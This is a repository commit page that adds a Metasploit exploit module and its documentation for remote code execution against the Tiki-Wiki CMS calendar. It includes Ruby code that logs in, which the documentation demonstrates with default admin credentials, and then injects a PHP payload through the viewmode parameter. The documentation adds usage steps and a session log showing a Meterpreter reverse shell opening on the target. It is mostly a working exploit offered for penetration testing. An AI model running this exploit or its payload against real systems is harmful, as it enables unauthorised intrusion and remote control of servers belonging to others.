infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

tiki calendar

bug/bundler_fix
h00die 2016-06-18 13:11:11 -04:00
parent 17f0a0770f
commit 3feff7533b
2 changed files with 234 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

76
documentation/modules/exploit/linux/http/tiki_calendar_exec.md Normal file
View File

@ -0,0 +1,76 @@
## Vulnerable Application
Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
### Creating A Testing Environment
1. Create a fresh Ubuntu 16.04 w/ a LAMP install
2. `apt-get install php-xml`
3. Normal php install at that point!
4. After install, login as admin:admin
5. Go to the Control Panels
6. Click Features
7. Enable Calendar under Main feature
8. Click Apply
#### Permissions
If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar
1. Log in as admin
2. From the top dropdown select permissions
3. Check Anonymous near the top
4. Click Assign
## Verification Steps
1. Install the software as documented above
2. Start msfconsole
3. Do: `use exploit/linux/http/tiki_calendar_exec`
4. Do: `set rhost 10.10.10.10`
5. (optional, if not set, set username to empty) Do: `set PASSWORD admin`
6. Do: `set payload php/bind_perl`
7. Do: `check`
```
[+] 10.10.10.10:80 The target is vulnerable.
```
7. Do: `exploit`
8. You should get a shell
## Options
**PASSWORD**
Password is set at first login. Default for admin is 'admin'.
## Scenarios
Example of running the ID command
```
msf > use exploit/linux/http/tiki_calendar_exec
msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
rhost => 192.168.2.190
msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
targeturi => /t14_1/
msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(tiki_calendar_exec) > set verbose true
verbose => true
msf exploit(tiki_calendar_exec) > set username ''
username =>
msf exploit(tiki_calendar_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious calendar view packet
[*] Sending stage (33721 bytes) to 192.168.2.190
[*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
meterpreter > sysinfo
Computer : tikiwiki
OS : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Meterpreter : php/php
meterpreter >
```

158
modules/exploits/linux/http/tiki_calendar_exec.rb Normal file
View File

@ -0,0 +1,158 @@
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Tiki-Wiki CMS Calendar Command Execution',
'Description' => %q(
Tiki-Wiki CMS's calendar module contains a rmeote code execution
vulnerability within the viewmode GET parameter.
The calendar module is NOT enabled by default. When enbled,
the default permissions are set to NOT allow anonymous users
to access.
Vulnerable versions: <=14.2, <=12.5 LTS, <=9.11 LTS and <=6.15
Verified/Tested against 14.1
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'Dany Ouellet' # discovery
],
'References' =>
[
[ 'EDB', '39965' ],
[ 'URL', 'https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki']
],
'License' => MSF_LICENSE,
'Platform' => %w( php ),
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 06 2016'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of Tiki-Wiki', '/']),
OptString.new('USERNAME', [ false, 'Username of a user with calendar access', 'admin']),
OptString.new('PASSWORD', [ false, 'Password of a user with calendar access', 'admin'])
], self.class
)
end
# returns cookie regardless of outcome
def authenticate
begin
# get a cookie to start with
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-login_scr.php'),
'method' => 'GET'
)
cookie = res.get_cookies
# if we have creds, login with them
vprint_status('Attempting Login')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-login.php'),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' =>
{
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'login' => '',
'stay_in_ssl_mode_present' => 'y',
'stay_in_ssl_mode' => 'n'
}
)
if res && res.redirect? && res.redirection.to_s.end_with?('tiki-login_scr.php')
fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
elsif res && res.redirect?
vprint_status("Verifying login... Visiting redirect to: #{res.redirection}")
res = send_request_cgi(
'uri' => res.redirection.to_s,
'method' => 'GET',
'cookie' => cookie
)
# double check auth worked and we got a Log out on the page.
# at times I got it to auth, but then it would give permission errors
# so we want to try to double check everything is good
unless res.body =~ /Log out/
fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
end
end
vprint_good("Login Successful!")
return cookie
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def check
begin
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
cookie = authenticate
end
flag = Rex::Text.rand_text_alpha(10)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-calendar.php'),
'method' => 'GET',
'cookie' => cookie,
'vars_get' =>
{
'viewmode' => "';print(#{flag});$a='"
}
)
if res
if res.body =~ /You do not have permission to view the calendar/
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
elsif res.body =~ /#{flag}/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def exploit
begin
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
cookie = authenticate
end
vprint_status('Sending malicious calendar view packet')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-calendar.php'),
'method' => 'GET',
'cookie' => cookie,
'vars_get' =>
{
'viewmode' => "';#{payload.encoded};$a='"
}
)
if res && res.body =~ /You do not have permission to view the calendar/
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end